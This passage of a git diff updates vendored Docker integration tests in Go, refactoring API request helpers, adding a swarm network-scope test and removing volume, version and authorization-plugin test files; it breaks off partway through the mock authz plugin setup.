-	c.Assert(json.Unmarshal(out, &r1), checker.IsNil)
+			// if root rotation is done and the trust root has changed, we don't have to poll anymore
+			if !info.Cluster.RootRotationInProgress && clusterTLSInfo.TrustRoot != currentTrustRoot {
+				break
+			}
 
-	c.Assert(r1.Scope, checker.Equals, "local")
+			// root rotation not done
+			time.Sleep(250 * time.Millisecond)
+		}
+		if cert != nil {
+			c.Assert(clusterTLSInfo.TrustRoot, checker.Equals, expectedCert)
+		}
+		// could take another second or two for the nodes to trust the new roots after they've all gotten
+		// new TLS certificates
+		for j := 0; j < 18; j++ {
+			mInfo := m.GetNode(c, m.NodeID()).Description.TLSInfo
+			wInfo := m.GetNode(c, w.NodeID()).Description.TLSInfo
+
+			if mInfo.TrustRoot == clusterTLSInfo.TrustRoot && wInfo.TrustRoot == clusterTLSInfo.TrustRoot {
+				break
+			}
 
-	var r2 types.NetworkResource
+			// nodes don't trust root certs yet
+			time.Sleep(250 * time.Millisecond)
+		}
+
+		c.Assert(m.GetNode(c, m.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo)
+		c.Assert(m.GetNode(c, w.NodeID()).Description.TLSInfo, checker.DeepEquals, clusterTLSInfo)
+		currentTrustRoot = clusterTLSInfo.TrustRoot
+	}
+}
 
-	status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out)))
+func (s *DockerSwarmSuite) TestAPINetworkInspectWithScope(c *check.C) {
+	d := s.AddDaemon(c, true, true)
 
-	c.Assert(json.Unmarshal(out, &r2), checker.IsNil)
+	name := "test-scoped-network"
+	ctx := context.Background()
+	apiclient, err := d.NewClient()
+	assert.NilError(c, err)
 
-	c.Assert(r2.Scope, checker.Equals, "swarm")
+	resp, err := apiclient.NetworkCreate(ctx, name, types.NetworkCreate{Driver: "overlay"})
+	assert.NilError(c, err)
+
+	network, err := apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{})
+	assert.NilError(c, err)
+	assert.Check(c, is.Equal("swarm", network.Scope))
+	assert.Check(c, is.Equal(resp.ID, network.ID))
+
+	_, err = apiclient.NetworkInspect(ctx, name, types.NetworkInspectOptions{Scope: "local"})
+	assert.Check(c, client.IsErrNotFound(err))
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go
index 3b38ba96f2..5b7e3e97f9 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go
@@ -2,26 +2,27 @@ package main
 
 import (
 	"fmt"
+	"io/ioutil"
 	"net/http"
-	"net/http/httptest"
 	"runtime"
 	"strconv"
 	"strings"
 
 	"github.com/docker/docker/api"
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) {
-	status, _, err := sockRequest("OPTIONS", "/", nil)
+	resp, _, err := request.Do("/", request.Method(http.MethodOptions))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 }
 
 func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) {
-	res, body, err := sockRequestRaw("GET", "/version", nil, "")
+	res, body, err := request.Get("/version")
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusOK)
 	body.Close()
@@ -33,7 +34,7 @@ func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) {
 }
 
 func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) {
-	if daemonPlatform != runtime.GOOS {
+	if testEnv.OSType != runtime.GOOS {
 		c.Skip("Daemon platform doesn't match test platform")
 	}
 	if api.MinVersion == api.DefaultVersion {
@@ -46,39 +47,26 @@ func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) {
 	v[1] = strconv.Itoa(vMinInt)
 	version := strings.Join(v, ".")
 
-	status, body, err := sockRequest("GET", "/v"+version+"/version", nil)
+	resp, body, err := request.Get("/v" + version + "/version")
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusBadRequest)
+	defer body.Close()
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusBadRequest)
 	expected := fmt.Sprintf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion)
-	c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected)
-}
-
-func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) {
-	var svrVersion string
-
-	server := httptest.NewServer(http.HandlerFunc(
-		func(w http.ResponseWriter, r *http.Request) {
-			w.Header().Set("API-Version", api.DefaultVersion)
-			url := r.URL.Path
-			svrVersion = url
-		}))
-	defer server.Close()
-
-	// Test using the env var first
-	result := icmd.RunCmd(icmd.Cmd{
-		Command: binaryWithArgs("-H="+server.URL[7:], "version"),
-		Env:     appendBaseEnv(false, "DOCKER_API_VERSION=xxx"),
-	})
-	c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version:  xxx", ExitCode: 1})
-	c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success)))
+	content, err := ioutil.ReadAll(body)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(string(content)), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestAPIErrorJSON(c *check.C) {
-	httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json")
+	httpResp, body, err := request.Post("/containers/create", request.JSONBody(struct{}{}))
 	c.Assert(err, checker.IsNil)
-	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
 	c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json")
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container")
 }
@@ -87,32 +75,36 @@ func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) {
 	// Windows requires API 1.25 or later. This test is validating a behaviour which was present
 	// in v1.23, but changed in 1.24, hence not applicable on Windows. See apiVersionSupportsJSONErrors
 	testRequires(c, DaemonIsLinux)
-	httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json")
+	httpResp, body, err := request.Post("/v1.23/containers/create", request.JSONBody(struct{}{}))
 	c.Assert(err, checker.IsNil)
-	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(httpResp.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
 	c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain")
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container")
 }
 
 func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) {
 	// 404 is a different code path to normal errors, so test separately
-	httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json")
+	httpResp, body, err := request.Get("/notfound", request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound)
 	c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json")
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(getErrorMessage(c, b), checker.Equals, "page not found")
 }
 
 func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) {
-	httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json")
+	httpResp, body, err := request.Get("/v1.23/notfound", request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound)
 	c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain")
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found")
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
deleted file mode 100644
index dfe14ec7b0..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go
+++ /dev/null
@@ -1,35 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	testRequires(c, memoryLimitSupport)
-	testRequires(c, swapMemorySupport)
-
-	name := "apiUpdateContainer"
-	hostConfig := map[string]interface{}{
-		"Memory":     314572800,
-		"MemorySwap": 524288000,
-	}
-	dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top")
-	_, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig)
-	c.Assert(err, check.IsNil)
-
-	c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800")
-	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
-	out, _ := dockerCmd(c, "exec", name, "cat", file)
-	c.Assert(strings.TrimSpace(out), checker.Equals, "314572800")
-
-	c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000")
-	file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"
-	out, _ = dockerCmd(c, "exec", name, "cat", file)
-	c.Assert(strings.TrimSpace(out), checker.Equals, "524288000")
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
deleted file mode 100644
index eb2de5904a..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go
+++ /dev/null
@@ -1,23 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"net/http"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestGetVersion(c *check.C) {
-	status, body, err := sockRequest("GET", "/version", nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(err, checker.IsNil)
-
-	var v types.Version
-
-	c.Assert(json.Unmarshal(body, &v), checker.IsNil)
-
-	c.Assert(v.Version, checker.Equals, dockerversion.Version, check.Commentf("Version mismatch"))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
deleted file mode 100644
index d1d44005e0..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go
+++ /dev/null
@@ -1,89 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"net/http"
-	"path/filepath"
-
-	"github.com/docker/docker/api/types"
-	volumetypes "github.com/docker/docker/api/types/volume"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestVolumesAPIList(c *check.C) {
-	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
-	dockerCmd(c, "run", "-v", prefix+"/foo", "busybox")
-
-	status, b, err := sockRequest("GET", "/volumes", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-
-	var volumes volumetypes.VolumesListOKBody
-	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
-
-	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
-}
-
-func (s *DockerSuite) TestVolumesAPICreate(c *check.C) {
-	config := volumetypes.VolumesCreateBody{
-		Name: "test",
-	}
-	status, b, err := sockRequest("POST", "/volumes/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b)))
-
-	var vol types.Volume
-	err = json.Unmarshal(b, &vol)
-	c.Assert(err, checker.IsNil)
-
-	c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name)
-}
-
-func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) {
-	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
-	dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox")
-
-	status, b, err := sockRequest("GET", "/volumes", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-
-	var volumes volumetypes.VolumesListOKBody
-	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
-	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
-
-	v := volumes.Volumes[0]
-	status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use"))
-
-	dockerCmd(c, "rm", "-f", "test")
-	status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data)))
-
-}
-
-func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) {
-	config := volumetypes.VolumesCreateBody{
-		Name: "test",
-	}
-	status, b, err := sockRequest("POST", "/volumes/create", config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b)))
-
-	status, b, err = sockRequest("GET", "/volumes", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b)))
-
-	var volumes volumetypes.VolumesListOKBody
-	c.Assert(json.Unmarshal(b, &volumes), checker.IsNil)
-	c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes))
-
-	var vol types.Volume
-	status, b, err = sockRequest("GET", "/volumes/"+config.Name, nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b)))
-	c.Assert(json.Unmarshal(b, &vol), checker.IsNil)
-	c.Assert(vol.Name, checker.Equals, config.Name)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
index 2df4fdc4d2..ef2c708bbe 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go
@@ -10,8 +10,9 @@ import (
 	"sync"
 	"time"
 
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/cli"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 const attachWait = 5 * time.Second
@@ -22,8 +23,8 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) {
 	endGroup.Add(3)
 	startGroup.Add(3)
 
-	err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done")
-	c.Assert(err, check.IsNil)
+	cli.DockerCmd(c, "run", "--name", "attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done")
+	cli.WaitRun(c, "attacher")
 
 	startDone := make(chan struct{})
 	endDone := make(chan struct{})
@@ -77,7 +78,7 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) {
 		c.Fatalf("Attaches did not initialize properly")
 	}
 
-	dockerCmd(c, "kill", "attacher")
+	cli.DockerCmd(c, "kill", "attacher")
 
 	select {
 	case <-endDone:
@@ -87,6 +88,14 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) {
 }
 
 func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) {
+	// TODO @jhowardmsft. Figure out how to get this running again reliable on Windows.
+	// It works by accident at the moment. Sometimes. I've gone back to v1.13.0 and see the same.
+	// On Windows, docker run -d -ti busybox causes the container to exit immediately.
+	// Obviously a year back when I updated the test, that was not the case. However,
+	// with this, and the test racing with the tear-down which panic's, sometimes CI
+	// will just fail and `MISS` all the other tests. For now, disabling it. Will
+	// open an issue to track re-enabling this and root-causing the problem.
+	testRequires(c, DaemonIsLinux)
 	out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox")
 
 	id := strings.TrimSpace(out)
@@ -138,7 +147,10 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) {
 	c.Assert(err, check.IsNil)
 	defer stdout.Close()
 	c.Assert(cmd.Start(), check.IsNil)
-	defer cmd.Process.Kill()
+	defer func() {
+		cmd.Process.Kill()
+		cmd.Wait()
+	}()
 
 	_, err = stdin.Write([]byte("hello\n"))
 	c.Assert(err, check.IsNil)
@@ -155,12 +167,11 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) {
 
 func (s *DockerSuite) TestAttachPausedContainer(c *check.C) {
 	testRequires(c, IsPausable)
-	defer unpauseAllContainers()
 	runSleepingContainer(c, "-d", "--name=test")
 	dockerCmd(c, "pause", "test")
 
 	result := dockerCmdWithResult("attach", "test")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result.Assert(c, icmd.Expected{
 		Error:    "exit status 1",
 		ExitCode: 1,
 		Err:      "You cannot attach to a paused container, unpause it first",
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
index fb794ccc40..9affb944b1 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go
@@ -9,7 +9,7 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
@@ -69,10 +69,10 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) {
 	cmd.Stdout = tty
 	cmd.Stderr = tty
 
-	errChan := make(chan error)
+	cmdExit := make(chan error)
 	go func() {
-		errChan <- cmd.Run()
-		close(errChan)
+		cmdExit <- cmd.Run()
+		close(cmdExit)
 	}()
 
 	c.Assert(waitRun(name), check.IsNil)
@@ -82,12 +82,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) {
 	cpty.Write([]byte{17})
 
 	select {
-	case err := <-errChan:
-		if err != nil {
-			buff := make([]byte, 200)
-			tty.Read(buff)
-			c.Fatalf("%s: %s", err, buff)
-		}
+	case <-cmdExit:
 	case <-time.After(5 * time.Second):
 		c.Fatal("timeout while detaching")
 	}
@@ -102,6 +97,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) {
 
 	err = cmd.Start()
 	c.Assert(err, checker.IsNil)
+	defer cmd.Process.Kill()
 
 	bytes := make([]byte, 10)
 	var nBytes int
@@ -124,11 +120,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) {
 		c.Fatal("timeout waiting for attach read")
 	}
 
-	err = cmd.Wait()
-	c.Assert(err, checker.IsNil)
-
 	c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #")
-
 }
 
 // TestAttachDetach checks that attach in tty mode can be detached using the long container ID
@@ -173,7 +165,7 @@ func (s *DockerSuite) TestAttachDetach(c *check.C) {
 	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
 
 	go func() {
-		dockerCmd(c, "kill", id)
+		dockerCmdWithResult("kill", id)
 	}()
 
 	select {
@@ -225,7 +217,7 @@ func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) {
 	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
 
 	go func() {
-		dockerCmd(c, "kill", id)
+		dockerCmdWithResult("kill", id)
 	}()
 
 	select {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
deleted file mode 100644
index 8a669fb379..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go
+++ /dev/null
@@ -1,133 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-var (
-	authzPluginName            = "riyaz/authz-no-volume-plugin"
-	authzPluginTag             = "latest"
-	authzPluginNameWithTag     = authzPluginName + ":" + authzPluginTag
-	authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest"
-	nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin"
-)
-
-func init() {
-	check.Suite(&DockerAuthzV2Suite{
-		ds: &DockerSuite{},
-	})
-}
-
-type DockerAuthzV2Suite struct {
-	ds *DockerSuite
-	d  *Daemon
-}
-
-func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux, Network)
-	s.d = NewDaemon(c)
-	c.Assert(s.d.Start(), check.IsNil)
-}
-
-func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) {
-	s.d.Stop()
-	s.ds.TearDownTest(c)
-}
-
-func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-	// Install authz plugin
-	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag)
-	c.Assert(err, checker.IsNil)
-	// start the daemon with the plugin and load busybox, --net=none build fails otherwise
-	// because it needs to pull busybox
-	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil)
-	c.Assert(s.d.LoadBusybox(), check.IsNil)
-
-	// defer disabling the plugin
-	defer func() {
-		c.Assert(s.d.Restart(), check.IsNil)
-		_, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag)
-		c.Assert(err, checker.IsNil)
-		_, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag)
-		c.Assert(err, checker.IsNil)
-	}()
-
-	// Ensure docker run command and accompanying docker ps are successful
-	out, err := s.d.Cmd("run", "-d", "busybox", "top")
-	c.Assert(err, check.IsNil)
-
-	id := strings.TrimSpace(out)
-
-	out, err = s.d.Cmd("ps")
-	c.Assert(err, check.IsNil)
-	c.Assert(assertContainerList(out, []string{id}), check.Equals, true)
-}
-
-func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-	// Install authz plugin
-	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag)
-	c.Assert(err, checker.IsNil)
-
-	// restart the daemon with the plugin
-	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil)
-
-	// defer disabling the plugin
-	defer func() {
-		c.Assert(s.d.Restart(), check.IsNil)
-		_, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag)
-		c.Assert(err, checker.IsNil)
-		_, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag)
-		c.Assert(err, checker.IsNil)
-	}()
-
-	out, err := s.d.Cmd("volume", "create")
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
-
-	out, err = s.d.Cmd("volume", "ls")
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
-
-	// The plugin will block the command before it can determine the volume does not exist
-	out, err = s.d.Cmd("volume", "rm", "test")
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
-
-	out, err = s.d.Cmd("volume", "inspect", "test")
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
-
-	out, err = s.d.Cmd("volume", "prune", "-f")
-	c.Assert(err, check.NotNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))
-}
-
-func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) {
-	testRequires(c, DaemonIsLinux, IsAmd64, Network)
-	// Install authz plugin with bad manifest
-	_, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginBadManifestName)
-	c.Assert(err, checker.IsNil)
-
-	// start the daemon with the plugin, it will error
-	c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil)
-
-	// restarting the daemon without requiring the plugin will succeed
-	c.Assert(s.d.Restart(), check.IsNil)
-}
-
-func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) {
-	testRequires(c, DaemonIsLinux, Network)
-	// start the daemon with a non-existent authz plugin, it will error
-	c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil)
-
-	// restarting the daemon without requiring the plugin will succeed
-	c.Assert(s.d.Restart(), check.IsNil)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
deleted file mode 100644
index a826249e2e..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go
+++ /dev/null
@@ -1,477 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"encoding/json"
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"net/http/httptest"
-	"os"
-	"path/filepath"
-	"strings"
-
-	"bufio"
-	"bytes"
-	"os/exec"
-	"strconv"
-	"time"
-
-	"net"
-	"net/http/httputil"
-	"net/url"
-
-	"github.com/docker/docker/pkg/authorization"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/plugins"
-	"github.com/go-check/check"
-)
-
-const (
-	testAuthZPlugin     = "authzplugin"
-	unauthorizedMessage = "User unauthorized authz plugin"
-	errorMessage        = "something went wrong..."
-	containerListAPI    = "/containers/json"
-)
-
-var (
-	alwaysAllowed = []string{"/_ping", "/info"}
-)
-
-func init() {
-	check.Suite(&DockerAuthzSuite{
-		ds: &DockerSuite{},
-	})
-}
-
-type DockerAuthzSuite struct {
-	server *httptest.Server
-	ds     *DockerSuite
-	d      *Daemon
-	ctrl   *authorizationController
-}
-
-type authorizationController struct {
-	reqRes        authorization.Response // reqRes holds the plugin response to the initial client request
-	resRes        authorization.Response // resRes holds the plugin response to the daemon response
-	psRequestCnt  int                    // psRequestCnt counts the number of calls to list container request api
-	psResponseCnt int                    // psResponseCnt counts the number of calls to list containers response API
-	requestsURIs  []string               // requestsURIs stores all request URIs that are sent to the authorization controller
-	reqUser       string
-	resUser       string
-}
-
-func (s *DockerAuthzSuite) SetUpTest(c *check.C) {
-	s.d = NewDaemon(c)
-	s.ctrl = &authorizationController{}
-}
-
-func (s *DockerAuthzSuite) TearDownTest(c *check.C) {
-	s.d.Stop()
-	s.ds.TearDownTest(c)
-	s.ctrl = nil
-}
-
-func (s *DockerAuthzSuite) SetUpSuite(c *check.C) {
-	mux := http.NewServeMux()
-	s.server = httptest.NewServer(mux)
-
-	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
-		b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}})
-		c.Assert(err, check.IsNil)
-		w.Write(b)
-	})
-
-	mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) {
-		defer r.Body.Close()
-		body, err := ioutil.ReadAll(r.Body)
-		c.Assert(err, check.IsNil)
-		authReq := authorization.Request{}
-		err = json.Unmarshal(body, &authReq)
-		c.Assert(err, check.IsNil)
-
-		assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody)
-		assertAuthHeaders(c, authReq.RequestHeaders)
-
-		// Count only container list api
-		if strings.HasSuffix(authReq.RequestURI, containerListAPI) {
-			s.ctrl.psRequestCnt++
-		}
-
-		s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI)
-
-		reqRes := s.ctrl.reqRes
-		if isAllowed(authReq.RequestURI) {
-			reqRes = authorization.Response{Allow: true}
-		}
-		if reqRes.Err != "" {
-			w.WriteHeader(http.StatusInternalServerError)
-		}
-		b, err := json.Marshal(reqRes)
-		c.Assert(err, check.IsNil)
-		s.ctrl.reqUser = authReq.User
-		w.Write(b)
-	})
-
-	mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) {
-		defer r.Body.Close()
-		body, err := ioutil.ReadAll(r.Body)
-		c.Assert(err, check.IsNil)
-		authReq := authorization.Request{}
-		err = json.Unmarshal(body, &authReq)
